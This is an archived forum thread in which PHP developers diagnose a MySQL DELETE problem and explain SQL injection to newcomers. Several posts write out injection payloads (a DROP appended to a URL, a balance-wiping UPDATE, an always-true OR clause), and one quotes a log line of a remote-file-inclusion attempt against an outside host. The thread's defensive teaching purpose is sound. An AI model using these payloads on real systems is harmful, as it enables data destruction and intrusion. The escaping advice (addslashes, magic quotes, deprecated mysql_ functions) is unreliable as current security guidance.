Delete row from mysql only deletes the contents?

mysql_query("DELETE FROM cart WHERE ItemId=$ItemId");

There is the code but the result in my database is that the ID number changes
from, let's say, 77 to 78 with 78's contents being empty. Therefore when I
look at the results - the deleted ID77 is gone but now I have ID78 with no
content!

Does anyone know why and how do I make it stop?

Michael
Jul 17 '05 #1
de Beers wrote:
> mysql_query("DELETE FROM cart WHERE ItemId=$ItemId");
>
> There is the code but the result in my database is that the ID number changes
> from, let's say, 77 to 78 with 78's contents being empty. Therefore when I
> look at the results - the deleted ID77 is gone but now I have ID78 with no
> content!
>
> Does anyone know why and how do I make it stop?

Your SQL query doesn't create a new empty row; you may have a bad if-statement
that causes your INSERT query to be run while you are deleting.

//Aho
Jul 17 '05 #2
"de Beers" <fd***@yahoo.ca> wrote in message
news:T4******************@news20.bellglobal.com...
> mysql_query("DELETE FROM cart WHERE ItemId=$ItemId");

Gah!!!

Always use the mysql connection id, and ALWAYS test database (and all other
IO) operations for errors!

$result = mysql_query("DELETE FROM cart WHERE ItemId='$ItemId'", $conn);
// Check the return value as well as the driver's error string
if (!$result || mysql_error())
{
    echo "Something went wrong with deleting this record: " . mysql_error($conn);
    exit;
}

ALWAYS delimit items in a SQL system using '. Otherwise you may be
vulnerable to SQL injection

removefromcart.php?PHPSESS=474984743&id=78;DROP%20 cart;

> There is the code but the result in my database is that the ID number changes
> from, let's say, 77 to 78 with 78's contents being empty. Therefore when I
> look at the results - the deleted ID77 is gone but now I have ID78 with no
> content!

See Aho's comments
Jul 17 '05 #3
Hi CJ;

I am pretty new to php and mysql.

"CJ Llewellyn" <sa****@tmslifeline.com> wrote in message
news:cg*********@slavica.ukpost.com...
ALWAYS delimit items in a SQL system using '. Otherwise you may be
vulnerable to SQL injection

removefromcart.php?PHPSESS=474984743&id=78;DROP%20 cart;


Could you explain this in a little more detail please?

TIA.

Charles...
---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.742 / Virus Database: 495 - Release Date: 8/19/04
Jul 17 '05 #4
"Charles Crume" <cc@charlescrumesoftware.com> wrote in message
news:Fa********************@fe2.columbus.rr.com...
Hi CJ;

I am pretty new to php and mysql.

"CJ Llewellyn" <sa****@tmslifeline.com> wrote in message
news:cg*********@slavica.ukpost.com...
ALWAYS delimit items in a SQL system using '. Otherwise you may be
vulnerable to SQL injection

removefromcart.php?PHPSESS=474984743&id=78;DROP%20 cart;


Could you explain this in a little more detail please?


You are passing raw data from the browser to your SQL statements. Supposing
I was a maladjusted twat, intent on making other people's lives miserable, I
could add SQL commands onto the end of a variable and effectively run my own
sql statements, such as a command to delete your cart database.

Jul 17 '05 #5
CJ Llewellyn <sa****@tmslifeline.com> wrote or quoted:
ALWAYS delimit items in a SQL system using '. Otherwise you may be
vulnerable to SQL injection

removefromcart.php?PHPSESS=474984743&id=78;DROP%20 cart;


Also, make sure the string you are inserting does not itself contain
your delimiter ;-)
--
__________
|im |yler http://timtyler.org/ ti*@tt1lock.org Remove lock to reply.
Jul 17 '05 #6
"Tim Tyler" <ti*@tt1lock.org> wrote in message news:I2********@bath.ac.uk...
CJ Llewellyn <sa****@tmslifeline.com> wrote or quoted:
ALWAYS delimit items in a SQL system using '. Otherwise you may be
vulnerable to SQL injection

removefromcart.php?PHPSESS=474984743&id=78;DROP%20 cart;


Also, make sure the string you are inserting does not itself contain
your delimiter ;-)


that's what magic quotes are for shirley? ;-)

Jul 17 '05 #7
CJ Llewellyn <sa****@tmslifeline.com> wrote:
that's what magic quotes are for shirley? ;-)


You're being a little presumptuous. The guy only showed you one line of code
and you're drilling him on the lines you assume are _not_ surrounding that
one line. Maybe he gets the ID from his own code and doesn't need the delim
for security. Maybe he already does error checking or doesn't care if the
statement fails. And besides, maybe he doesn't like magic quotes (like me)
because he doesn't like things to go on without explicitly telling them to.

I know you're being helpful, but I guess the main thing that bothers me is
the "Gah!!!" and the several capitalized "ALWAYS"s.

--
eth'nT
Jul 17 '05 #8

"CJ Llewellyn" <sa****@tmslifeline.com> wrote in message
news:cg**********@slavica.ukpost.com...
"Charles Crume" <cc@charlescrumesoftware.com> wrote in message
news:Fa********************@fe2.columbus.rr.com...
Hi CJ;

I am pretty new to php and mysql.

"CJ Llewellyn" <sa****@tmslifeline.com> wrote in message
news:cg*********@slavica.ukpost.com...
ALWAYS delimit items in a SQL system using '. Otherwise you may be
vulnerable to SQL injection

removefromcart.php?PHPSESS=474984743&id=78;DROP%20 cart;
Could you explain this in a little more detail please?


You are passing raw data from the browser to your SQL statements.

Supposing I was a maladjusted twat, intent on make other people's lives miserable, I
could add SQL commands onto the end of a variable and effectively run my own sql statements, such as a command to delete your cart database.


I gathered this much. What I was looking for was a little detail/explanation
in how one would "add SQL commands" and how to prevent them from doing it.

And... just what are "magic quotes"?

Charles...
Jul 17 '05 #9
"Ethan T" <gt*******@SPAMMINmail.gatech.edu> wrote in message
news:cg**********@ngspool-d02.news.aol.com...
> CJ Llewellyn <sa****@tmslifeline.com> wrote:
> > that's what magic quotes are for shirley? ;-)
>
> You're being a little presumptuous. The guy only showed you one line of
> code and you're drilling him on the lines you assume are _not_ surrounding that
> one line.

Not assumptions, that was the code he was working with. Given the fact that
there are other potentially fatal flaws in his coding, and his own statement
that he is a newbie, I can safely deduce that is his own work.

> Maybe he gets the ID from his own code and doesn't need the delim
> for security. Maybe he already does error checking or doesn't care if the
> statement fails.

Well he should be bothered about whether his statement fails, especially if
it leads to his whole database being dropped.

I've seen far too many tutorials skip over error checking. Which when
dealing with untrusted users is such a 'nightmarish' scenario, it needs very
firm underlining.

> And besides, maybe he doesn't like magic quotes (like me)
> because he doesn't like things to go on without explicitly telling them to.

He doesn't know what magic quotes are, so if nobody introduces him to them
he'll be none the wiser.

> I know you're being helpful, but I guess the main thing that bothers me is
> the "Gah!!!" and the several capitalized "ALWAYS"s.

It may be dramatic, but so again is having to reinstall your server,
explaining to customers that you've lost their order and their credit card
details are now in the hands of criminals.

Jul 17 '05 #10
"Charles Crume" <cc@charlescrumesoftware.com> wrote in message
news:GR*******************@fe2.columbus.rr.com...

> "CJ Llewellyn" <sa****@tmslifeline.com> wrote in message
> news:cg**********@slavica.ukpost.com...
> > "Charles Crume" <cc@charlescrumesoftware.com> wrote in message
> > news:Fa********************@fe2.columbus.rr.com...
> > > Hi CJ;
> > >
> > > I am pretty new to php and mysql.
> > >
> > > "CJ Llewellyn" <sa****@tmslifeline.com> wrote in message
> > > news:cg*********@slavica.ukpost.com...
> > > > ALWAYS delimit items in a SQL system using '. Otherwise you may be
> > > > vulnerable to SQL injection
> > > >
> > > > removefromcart.php?PHPSESS=474984743&id=78;DROP%20 cart;
> > >
> > > Could you explain this in a little more detail please?
> >
> > You are passing raw data from the browser to your SQL statements. Supposing
> > I was a maladjusted twat, intent on making other people's lives miserable, I
> > could add SQL commands onto the end of a variable and effectively run my own
> > sql statements, such as a command to delete your cart database.
>
> I gathered this much. What I was looking for was a little detail/explanation
> in how one would "add SQL commands" and how to prevent them from doing it.

Your sql statement uses the get variable id as the record identifier. As
your sql statement doesn't delimit the variable id, if you add extra SQL
syntax (statements) to the id variable on the url, this will then be
processed along with your DELETE statement.

Assuming that your id is in fact a numeric value, then

$id = (int)$id;

works wonders.

You should also write sql statements with delimiters like

INSERT INTO foo (field1, field2, field3) VALUES ('$field1', '$field2', '$field3')

DELETE FROM foo WHERE id = '$id'

> And... just what are "magic quotes"?

magic quotes is a php feature that 'escapes' (places a \ before) certain
characters in browser (user) supplied variables, i.e. \ and '

Most seasoned programmers like them turned off, as the programmer likes to
manually prepare any data heading towards the database, and you don't need
to strip the extra slashes from the data to process it.

You should check whether it is turned on at the start of any script

http://uk.php.net/manual/en/function...quotes-gpc.php

And ensure your program can deal with the variables quoted or unquoted.
Jul 17 '05 #11
Hi CJ;

Thanks for the reply and additional information.

[snip]

> Your sql statement uses the get variable id as the record identifier. As
> your sql statement doesn't delimit the variable id, if you add extra SQL
> syntax (statements) to the id variable on the url, this will then be
> processed along with your DELETE statement.

Well, I guess I just don't have the mindset to try and screw stuff up,
therefore making it difficult to program defensively against it. I see where
$ItemId is not specifically delimited, so are you saying that one could
potentially do something like:

$ItemId = "'12'; DELETE FROM CART WHERE ItemId='3'; DELETE FROM cart WHERE
ItemId='44'"

or worse??

Just what kinds of "extra SQL syntax" could someone add? Just how bad could
it get (remember, I'm a newbie and still on the BIG learning curve)?

Are there other techniques to defend against such malevolent action by a
user??

> Assuming that your id is in fact a numeric value, then
>
> $id = (int)$id;
>
> works wonders.

OK, I can see how this would drop any characters following the initial
numeric value of $id.

> You should also write sql statements with delimiters like
>
> INSERT INTO foo (field1, field2, field3) VALUES ('$field1', '$field2', '$field3')
>
> DELETE FROM foo WHERE id = '$id'

OK, this is how I write my SQL statements... but one *has* to use
delimiters, don't they? I guess I don't understand what you are telling me
here. Am I overlooking something about the use of ' (single quotes) vs. "
(double quotes)?

> > And... just what are "magic quotes"?
>
> magic quotes is a php feature that 'escapes' (places a \ before) certain
> characters in browser (user) supplied variables, i.e. \ and '
>
> Most seasoned programmers like them turned off, as the programmer likes to
> manually prepare any data heading towards the database, and you don't need
> to strip the extra slashes from the data to process it.
>
> You should check whether it is turned on at the start of any script
>
> http://uk.php.net/manual/en/function...quotes-gpc.php

OK, I checked this out and the output from "phpinfo()" shows:

1) magic_quotes_gpc=ON
2) magic_quotes_runtime=OFF
3) magic_quotes_sybase=OFF.

The output lists both "local value" and "master value" columns, so I will
contact my ISP to see if these can be changed.

BTW, is there a list of suggested values for all of the directives listed by
"phpinfo()"?

> And ensure your program can deal with the variables quoted or unquoted.

Not exactly sure what you are telling me here. What is the difference
between a quoted vs. unquoted variable? Do you have a couple of short
examples? I would sure appreciate seeing an example or two.

TIA.

Charles...
Jul 17 '05 #12
"Charles Crume" <cc@charlescrumesoftware.com> wrote in message
news:IQ*******************@fe2.columbus.rr.com...
> Hi CJ;
>
> Thanks for the reply and additional information.
>
> [snip]
>
> > Your sql statement uses the get variable id as the record identifier. As
> > your sql statement doesn't delimit the variable id, if you add extra SQL
> > syntax (statements) to the id variable on the url, this will then be
> > processed along with your DELETE statement.
>
> Well, I guess I just don't have the mindset to try and screw stuff up,
> therefore making it difficult to program defensively against it. I see
> where $ItemId is not specifically delimited, so are you saying that one could
> potentially do something like:
>
> $ItemId = "'12'; DELETE FROM CART WHERE ItemId='3'; DELETE FROM cart WHERE
> ItemId='44'"
>
> or worse??

That is it in a nutshell. For example I'm used to seeing this sort of stuff
in my web logs quite often. This is an attempt to use my site as a web
proxy.

201.9.9.140 - - [01/Aug/2004:10:33:55 +0100] "GET /index.php?page=http://dorohoy.org/lila.jpg?&cmd=id HTTP/1.0" 200 11740

Needless to say it won't work in a month of Sundays, but script kiddies are
very persistent.

> Just what kinds of "extra SQL syntax" could someone add? Just how bad could
> it get (remember, I'm a newbie and still on the BIG learning curve)?

If they know your host's naming convention for databases then they could
delete the whole database.

SQL injections have been used in the past to create a suid shell (command
prompt, running with higher permissions than it should do).

They could deface your web site, or steal your passwords.

> Are there other techniques to defend against such malevolent action by a
> user??

ensure fields are delimited, and that you have escaped any user supplied
data first.

> > Assuming that your id is in fact a numeric value, then
> >
> > $id = (int)$id;
> >
> > works wonders.
>
> OK, I can see how this would drop any characters following the initial
> numeric value of $id.
>
> > You should also write sql statements with delimiters like
> >
> > INSERT INTO foo (field1, field2, field3) VALUES ('$field1', '$field2', '$field3')
> >
> > DELETE FROM foo WHERE id = '$id'
>
> OK, this is how I write my SQL statements... but one *has* to use
> delimiters, don't they? I guess I don't understand what you are telling me
> here. Am I overlooking something about the use of ' (single quotes) vs. "
> (double quotes)?

MySql & PostgreSql use single quotes as delimiters, MS Sql and Access use
double quotes.

> > > And... just what are "magic quotes"?
> >
> > magic quotes is a php feature that 'escapes' (places a \ before) certain
> > characters in browser (user) supplied variables, i.e. \ and '
> >
> > Most seasoned programmers like them turned off, as the programmer likes to
> > manually prepare any data heading towards the database, and you don't need
> > to strip the extra slashes from the data to process it.
> >
> > You should check whether it is turned on at the start of any script
> >
> > http://uk.php.net/manual/en/function...quotes-gpc.php
>
> OK, I checked this out and the output from "phpinfo()" shows:
>
> 1) magic_quotes_gpc=ON
> 2) magic_quotes_runtime=OFF
> 3) magic_quotes_sybase=OFF.
>
> The output lists both "local value" and "master value" columns, so I will
> contact my ISP to see if these can be changed.
>
> BTW, is there a list of suggested values for all of the directives listed
> by "phpinfo()"?
>
> > And ensure your program can deal with the variables quoted or unquoted.
>
> Not exactly sure what you are telling me here. What is the difference
> between a quoted vs. unquoted variable? Do you have a couple of short
> examples? I would sure appreciate seeing an example or two.

From the link above, this checks to see if php has automatically added
slashes, if not it'll add them:-

<?php
echo get_magic_quotes_gpc(); // 1
echo $_POST['lastname']; // O\'reilly
echo addslashes($_POST['lastname']); // O\\\'reilly

if (!get_magic_quotes_gpc()) {
    $lastname = addslashes($_POST['lastname']);
} else {
    $lastname = $_POST['lastname'];
}

echo $lastname; // O\'reilly
$sql = "INSERT INTO lastnames (lastname) VALUES ('$lastname')";
?>

Jul 17 '05 #13
Okay I am a newbie but here is the rest of the code.

- The id is sent from a checked box on their cart, the submit button is sent
to delete.php which has the script:

{
    mysql_query("DELETE FROM cart WHERE ItemId=$ItemId");
    echo "Thank you! Information updated.";
    echo mysql_error();
    echo mysql_errno();
}

But I get no error. So please help me if you can. By the way I have an
include that connects to the database.

As for the shouting - I don't mind - it makes me reluctant to ask for help
sometimes. So - am I (a) vulnerable to a twat (b) and are my two echoes
enough of an error check.

But most importantly -!! Why does it not work? Someone mentioned an if
statement - in this case I don't use one - should I?

Anyway thanks for the help you can offer.
Jul 17 '05 #14
de Beers <fd***@yahoo.ca> wrote:
- The id is sent from a checked box on their cart, the submit button
is sent to delete.php which has the script:
But I get no error. So please help me if you can. By the way I have
an include. that connects to the database.


Like someone else said, it looks like your script is doing a new INSERT
somewhere else in the code. Write a very simple script that has nothing else
in it but:

[mysql_connect...select db, etc.]
$ItemId = 555; // replace with a real, valid ID
mysql_query("DELETE FROM cart WHERE ItemId=$ItemId");
echo "Thank you! Information updated.";
echo mysql_error();
echo mysql_errno();

Just that code exactly, and see what the result is. If there's no problem
(it deletes properly and recreates nothing), you've probably got a problem
somewhere else. For debugging, I like to store my SQL statements in
variables and echo them anytime they're called for real. That way you see
exactly what's sent to MySQL.

--
eth'nT
Jul 17 '05 #15
[snip]
As for the shouting- I don't mind - it makes me reluctant to ask for help
sometimes.


You know, I consider a capitalized word or two as emphasized -- not shouting
(on the dBASE newsgroups I see *word* or _word_ -- not sure what these chars
signify exactly, but I've kinda picked up on using them). Think about it.
During normal conversation don't we all fluctuate our voices to emphasize a
word or phrase here and there? But we don't raise our voice for the entire
sentence, or paragraph -- that is shouting :-)

And... it doesn't discourage me for asking for help (and it shouldn't
discourage you either). Asking questions is the best way to get an answer to
a specific issue/problem.

What the heck, I ask lots of questions and some of them just gotta seem dumb
and/or stupid -- but I've always believed it better to ask and learn than to
not ask.

Charles...
Jul 17 '05 #16
Hi CJ;

Let me begin by thanking you for your time and assistance!!!

[snip]

> That is it in a nutshell. For example I'm used to seeing this sort of stuff
> in my web logs quite often. This is an attempt to use my site as a web
> proxy.
>
> 201.9.9.140 - - [01/Aug/2004:10:33:55 +0100] "GET /index.php?page=http://dorohoy.org/lila.jpg?&cmd=id HTTP/1.0" 200 11740

Very interesting! Thanks for the heads up.

> If they know your host's naming convention for databases then they could
> delete the whole database.
>
> SQL injections have been used in the past to create a suid shell (command
> prompt, running with higher permissions than it should do).
>
> They could deface your web site, or steal your passwords.

Ouch!!! I didn't realize it could get that bad.

[snip]

> MySql & PostgreSql use single quotes as delimiters, MS Sql and Access use
> double quotes.

OK -- I was not aware of this -- back to the manual for a little more
reading on delimiters.

[snip]

> From the link above, this checks to see if php has automatically added
> slashes, if not it'll add them:-

[snip]

I had to alter the above script to use GET instead of POST:
----------------
<?php
echo get_magic_quotes_gpc(); // 1
echo "<br>";
echo "Get: " . $_GET['lastname']; // O\'reilly
echo "<br>";
echo "addslashes: " . addslashes($_GET['lastname']); // O\\\'reilly
echo "<br>";
if (!get_magic_quotes_gpc()) {
    $lastname = addslashes($_GET['lastname']);
}
else {
    $lastname = $_GET['lastname'];
}
echo "lastname: " . $lastname; // O\'reilly
echo "<br>";
$sql = "INSERT INTO lastnames (lastname) VALUES ('$lastname')";
echo "sql: " . $sql;
?>
----------------

to get it to run (and I added some <br> HTML so that I could more readily
see what was happening). The resulting output was:
----------------
1
Get: O\\\'Reilly
addslashes: O\\\\\\\'Reilly
lastname: O\\\'Reilly
sql: INSERT INTO lastnames (lastname) VALUES ('O\\\'Reilly')
----------------

I see where PHP inserted \ characters to "escape" (correct terminology??)
the \ and ' characters. This, of course, would mess up the value (i.e.,
lastname) being inserted into the table. Is this the point you are trying to
teach me, or is there some other issue I am missing?

TIA.

Charles...
Jul 17 '05 #17
> Well, I guess I just don't have the mindset to try and screw stuff up,
> therefore making it difficult to program defensively against it. I see where
> $ItemId is not specifically delimited, so are you saying that one could
> potentially do something like:
>
> $ItemId = "'12'; DELETE FROM CART WHERE ItemId='3'; DELETE FROM cart WHERE
> ItemId='44'"
>
> or worse?? Just what kinds of "extra SQL syntax" could someone add? Just how bad could
> it get (remember, I'm a newbie and still on the BIG learning curve)?

A lot worse. Think of the most destructive, malicious, or
money-stealing commands you can. DELETE with no where clause. DROP
TABLE. DROP DATABASE. Granting full privileges to a remote site.
SELECT on all of your credit card numbers. Adding a record for a
*big* refund to the attacker's credit card. Add a bunch of free
accounts. Change all your prices to negative large numbers.

> > DELETE FROM foo WHERE id = '$id'

Beware of the guy who fills in id with the value:

1'; UPDATE accounts SET balance = -99999999.99; DELETE FROM foo WHERE id = '2

or for that matter:

' OR 1 OR id = '

(substitute those in for $id and see what the result looks like.
The second one is dangerous even if multiple SQL statements per
query are not allowed.)

> OK, this is how I write my SQL statements... but one *has* to use
> delimiters, don't they? I guess I don't understand what you are telling me
> here. Am I overlooking something about the use of ' (single quotes) vs. "
> (double quotes)?


If you let me put delimiters into a web form and you don't end up quoting
them when they get into the SQL statement, you're in trouble.

If I can get a SQL error by putting one single quote or one double
quote into a web form, you're in trouble. In fact, if I can do
ANYTHING with a web form that can provoke a SQL error (failure to
find a record is not an error in this context; all I have to do for
that is enter a nonexistent ID number) on your server, you're in
trouble.

Gordon L. Burditt
Jul 17 '05 #18
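
The substitution suggested in the post above, carried out as an added example (not code from any poster in this thread): the value `' OR 1 OR id = '` is sent through the quoted DELETE built by string interpolation, then through the `(int)` cast recommended earlier in the thread, then through a bound parameter. It assumes PHP 7 or later with the PDO SQLite driver so that it runs offline; the table name `foo` follows the thread, while the rows and the function names are constructed for illustration.

```php
<?php
// Added example: constructed rows in an in-memory SQLite database,
// so nothing outside this script is touched.

function freshTable(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE foo (id INTEGER PRIMARY KEY, item TEXT)');
    $db->exec("INSERT INTO foo (id, item) VALUES (1, 'apples'), (2, 'pears'), (3, 'plums')");
    return $db;
}

function rowsLeft(PDO $db): int
{
    return (int) $db->query('SELECT COUNT(*) FROM foo')->fetchColumn();
}

// 1. The pattern from the thread: quotes around the value and nothing else.
function deleteInterpolated(PDO $db, string $id): string
{
    $sql = "DELETE FROM foo WHERE id = '$id'";
    $db->exec($sql);
    return $sql; // returned so the caller can show exactly what was sent
}

// 2. Integer cast, usable only when the id really is numeric.
function deleteCast(PDO $db, string $id): string
{
    $n = (int) $id; // anything that is not a leading number is discarded
    $sql = "DELETE FROM foo WHERE id = $n";
    $db->exec($sql);
    return $sql;
}

// 3. Bound parameter: the value never becomes part of the SQL text.
function deleteBound(PDO $db, string $id): string
{
    $stmt = $db->prepare('DELETE FROM foo WHERE id = ?');
    $stmt->execute([$id]);
    return $stmt->queryString;
}

// The second value quoted in the post above, used unchanged.
$input = "' OR 1 OR id = '";

foreach (['deleteInterpolated', 'deleteCast', 'deleteBound'] as $fn) {
    $db  = freshTable(); // each variant starts from the same three rows
    $sql = $fn($db, $input);
    printf("%-19s %-46s rows left: %d of 3\n", $fn, $sql, rowsLeft($db));
}
```

Only the interpolated variant empties the table; the cast and the bound parameter both leave all three rows in place, which is why quoting the value without escaping or binding it is not a defence.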
"de Beers" <fd***@yahoo.ca> wrote in message
news:3q********************@news20.bellglobal.com...
> Okay I am a newbie but here is the rest of the code.
>
> - The id is sent from a checked box on their cart, the submit button is sent
> to delete.php which has the script:
>
> {
> mysql_query("DELETE FROM cart WHERE ItemId=$ItemId");
> echo "Thank you! Information updated.";
> echo mysql_error();
> echo mysql_errno();
> }
>
> But I get no error. So please help me if you can. By the way I have an
> include that connects to the database. As for the shouting - I don't mind - it
> makes me reluctant to ask for help sometimes. So - am I (a) vulnerable to a
> twat (b) and are my two echoes enough of an error check.

You need to look at your SQL statement

$sql = "DELETE FROM cart WHERE ItemId='$ItemId'";
$result = mysql_query($sql);
// mysql_affected_rows() is 0 when no row matched the WHERE clause
if (!$result || mysql_error() || mysql_affected_rows() < 1)
{
    echo "An error has occurred [$sql] : " . mysql_error();
}
else
{
    echo "Elvis has left the building, or we have deleted your item from the cart";
}

> But most importantly -!! Why does it not work? Someone mentioned an if
> statement - in this case I don't use one - should I?

You'll probably find that $ItemId is not populated.
Jul 17 '05 #19
"Charles Crume" <cc@charlescrumesoftware.com> wrote in
news:dw********************@fe2.columbus.rr.com:
You know, I consider a capitalized word or two as emphasized -- not
shouting (on the dBASE newsgroups I see *word* or _word_ -- not sure
what these chars signify exactly, but I've kinda picked up on using
them).


Way back in the old dial-in bulletin board days, (pre WWW) some ANSI
enabled software rendered them as *bold*, _underlined_, and /italic/. My
eyes still interpret them automatically ;)

--
Mark A. Boyd
Keep-On-Learnin' :)
Jul 17 '05 #20
Mark A. Boyd <mb****@sanDotrr.com> wrote:
Way back in the old dial-in bulletin board days, (pre WWW) some ANSI
enabled software rendered them as *bold*, _underlined_, and /italic/.
My eyes still interpret them automatically ;)


With OEQuoteFix, OE converts them automatically as well :)

--
eth'nT
Jul 17 '05 #21
